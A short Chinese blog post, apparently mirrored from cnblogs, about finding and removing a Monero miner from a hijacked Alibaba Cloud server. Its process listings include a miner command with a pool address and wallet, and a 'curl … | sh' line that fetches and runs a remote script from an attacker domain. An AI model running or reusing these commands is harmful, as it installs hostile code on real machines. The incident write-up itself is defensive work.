zoukankan      html  css  js  c++  java
  • 阿里云服务器被劫持成挖矿肉鸡的修复过程

    一台不太用阿里云服务器被运营报告连不上。putty登录查看发现全是一个叫yam的进程。

    上网查了一下,可能是被做成挖矿机了。

    先查看进程

    ps aux |grep yam

    结果如下

    root       670  0.9  1.8 188648 18456 ?        Sl   Nov22 212:41 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root       904  0.9  2.0 188648 20556 ?        Sl   Nov22 212:20 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root      1462  0.9  2.0 188648 20396 ?        Sl   Nov22 211:58 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root      1976  0.9  1.4 188648 14464 ?        Sl   Nov22 211:35 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root      2520  0.9  0.6 188648  6640 ?        Sl   Nov22 211:08 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    ....

    先把进程杀掉

     killall -9 yam

    再查看所有进程

    ps aut

    root     28658  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty1
    root     28659  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty2
    root     28660  0.0  0.0   4064    72 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty3
    root     28661  0.0  0.0   4064    72 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty4
    root     28662  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty5
    root     28808  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty6
    root     29794  0.0  0.0 106092   148 ?        Ss   Nov21   0:00 /bin/sh -c curl -fsSL http://www.haveabitchin.com/pm.sh?1118 | sh
    root     29797  0.0  0.0 106096   156 ?        S    Nov21   0:00 sh
    root     29915  0.0  0.4 208564  4596 ?        Sl   Nov21   1:57 /tmp/duckduckgo
    

    发现这一段明显是劫持过程。

    然后把这些文件全部删除。

    完毕。

  • 相关阅读:
    Linux部署Spingboot项目
    Linux Centos7yum安装Mysql8.0.21
    Linux配置网络yum源,提高下载速度
    Linux安装jdk1.8
    Spring的AOP
    Spring的事务管理
    Maven项目中,使用mybatis,根据数据库自动生成pojo实体类、dao、mapper
    Ubuntu14.04中使用docker容器部署tomcat镜像+java web项目
    mybatis
    spl
  • 原文地址:https://www.cnblogs.com/laomanong/p/6143902.html
Copyright © 2011-2022 走看看